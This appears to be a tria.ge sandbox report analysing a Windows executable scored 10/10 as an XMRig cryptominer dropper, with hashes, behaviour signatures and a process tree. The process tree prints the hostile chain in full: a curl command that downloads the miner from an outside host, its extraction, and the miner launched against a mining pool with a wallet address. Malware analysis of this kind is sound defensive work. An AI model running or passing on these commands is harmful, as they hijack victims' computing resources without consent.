Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Resubmissions

11/03/2024, 21:08

240311-zy7ywsed31 10

11/03/2024, 21:06

240311-zx53xagd73 10

11/03/2024, 21:02

240311-zvwrfsec3x 10

11/03/2024, 21:01

240311-ztxx5aeb9x 10

11/03/2024, 20:59

240311-zs72psgc56 10

11/03/2024, 20:57

240311-zrmpdaeb3v 10

11/03/2024, 20:56

240311-zqzbsagb66 10

11/03/2024, 20:55

240311-zqlexsgb55 10

11/03/2024, 20:54

240311-zp4j4sgb43 10

11/03/2024, 20:53

240311-zplz3agb32 10

Analysis

  • max time kernel
    147s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11/03/2024, 20:54

General

  • Target

    test - Copy (9).exe

  • Size

    6KB

  • MD5

    4634098fe194204dc03f967cc0b19cd6

  • SHA1

    eaa58619c6cea9f148cec61ee504cd727b3e80d8

  • SHA256

    a1070b8803e4243699a44a77e60a199282814495bc3bd94759c07021c0a6c70c

  • SHA512

    64e97fac56a25daf99f8ee1a9f480acc8020d5da4eb96ea77022c9170f6300b7b5479fce86e3e7e088cdaabdf123b65872e09b0ae17f8f97ea2fe58b6ecf7a9d

  • SSDEEP

    96:2Fb158Vgo4CVvAXklfZT8kYl9RxxgAVNb8ICcGKzNt:oMV1vAX+8kYDRxbLh4s

Score
10/10

Malware Config

Signatures

  • XMRig Miner payload 10 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\test - Copy (9).exe
    "C:\Users\Admin\AppData\Local\Temp\test - Copy (9).exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:184
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8UpeMi2G.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1984
      • C:\Windows\system32\curl.exe
        curl -o "C:\xmrig\xmrig-6.21.1-gcc-win64.zip" https://1488.netlify.app/xmrig-6.21.1-gcc-win64.zip
        3⤵
          PID:4864
        • C:\Windows\system32\tar.exe
          tar -xf "C:\xmrig\xmrig-6.21.1-gcc-win64.zip"
          3⤵
            PID:924
          • C:\xmrig\xmrig-6.21.1\xmrig.exe
            C:\xmrig\xmrig-6.21.1\xmrig.exe --coin=XMR -o xmr.2miners.com:2222 -u 49QgS4Cu9uqVeqgDpwtdZWYZrDNrUJXfzDiGmwsZFLdEgQPAQV7SbswUHqZG3B45HAiSR1cYZoSvgC56kctnqsSjMNFnJmU.RIG -p x --cpu-affinity=5 --cpu-no-yield
            3⤵
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            PID:4444

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Temp\8UpeMi2G.bat

        Filesize

        421B

        MD5

        67d11b392feb0ad59fc11ff3e79dfeee

        SHA1

        7df5785988cb76c4893773614572c93baaa18717

        SHA256

        69bcf6c4c959410d5857ac219600cec68035bd92e708c0bf7318eece8d5acb9d

        SHA512

        50835d7dccb22cbf052a64ce2dd50df97f726b1d2044ab0e55ba42a2874601b6fe064f84659f89ce079627d147cf49d9548b24b2160a17783b934c6793507f11

      • C:\xmrig\xmrig-6.21.1-gcc-win64.zip

        Filesize

        87KB

        MD5

        43ae6ca576b8f32a3a70cb4b53c3733d

        SHA1

        e217a4ef7c93dbc890ee2b9308e2edb78bda496d

        SHA256

        aca9e9dc0975e6d2f67259b7d54f72605e70d2bd7aa1fe4d581a59cd011a987d

        SHA512

        9edf3e80d6ec779b63e11d15329f3e4fcca1c6f0b2f49d57abff3c7b03d2de2a04e8b8772bc124f32cca1ad051b629aefce3452ab553ed6063a50b57229afaa3

      • C:\xmrig\xmrig-6.21.1\xmrig.exe

        Filesize

        273KB

        MD5

        3a11aa292c6de7032f0074f171d8bab6

        SHA1

        c1565ae9f5854892b065d79b1e654b1767ac9939

        SHA256

        d58074de1efaf171d9e3443c9557dba3529fd395dafffd9cb62b8f2effb33ea6

        SHA512

        e075ddaae0c5ff74758d6f2eccdc3bc1dd8c421d935617b6c120b42cb9ad70dda5cf1cc6ef34744a90126f01166613d2ca674084bb4f72ecaeaa4a0cd8fb3ac7

      • memory/184-5-0x00007FFCD5E30000-0x00007FFCD68F1000-memory.dmp

        Filesize

        10.8MB

      • memory/184-7-0x00007FFCD5E30000-0x00007FFCD68F1000-memory.dmp

        Filesize

        10.8MB

      • memory/184-24-0x00007FFCD5E30000-0x00007FFCD68F1000-memory.dmp

        Filesize

        10.8MB

      • memory/184-0-0x0000000000A10000-0x0000000000A18000-memory.dmp

        Filesize

        32KB

      • memory/4444-27-0x00007FF6F4280000-0x00007FF6F4D84000-memory.dmp

        Filesize

        11.0MB

      • memory/4444-25-0x000001FA8FC70000-0x000001FA8FC90000-memory.dmp

        Filesize

        128KB

      • memory/4444-26-0x00007FF6F4280000-0x00007FF6F4D84000-memory.dmp

        Filesize

        11.0MB

      • memory/4444-23-0x000001FA8F990000-0x000001FA8F9B0000-memory.dmp

        Filesize

        128KB

      • memory/4444-28-0x000001FA913B0000-0x000001FA913D0000-memory.dmp

        Filesize

        128KB

      • memory/4444-29-0x000001FA913D0000-0x000001FA913F0000-memory.dmp

        Filesize

        128KB

      • memory/4444-30-0x00007FF6F4280000-0x00007FF6F4D84000-memory.dmp

        Filesize

        11.0MB

      • memory/4444-31-0x00007FF6F4280000-0x00007FF6F4D84000-memory.dmp

        Filesize

        11.0MB

      • memory/4444-33-0x00007FF6F4280000-0x00007FF6F4D84000-memory.dmp

        Filesize

        11.0MB

      • memory/4444-35-0x00007FF6F4280000-0x00007FF6F4D84000-memory.dmp

        Filesize

        11.0MB

      • memory/4444-36-0x00007FF6F4280000-0x00007FF6F4D84000-memory.dmp

        Filesize

        11.0MB

      • memory/4444-37-0x00007FF6F4280000-0x00007FF6F4D84000-memory.dmp

        Filesize

        11.0MB

      • memory/4444-39-0x00007FF6F4280000-0x00007FF6F4D84000-memory.dmp

        Filesize

        11.0MB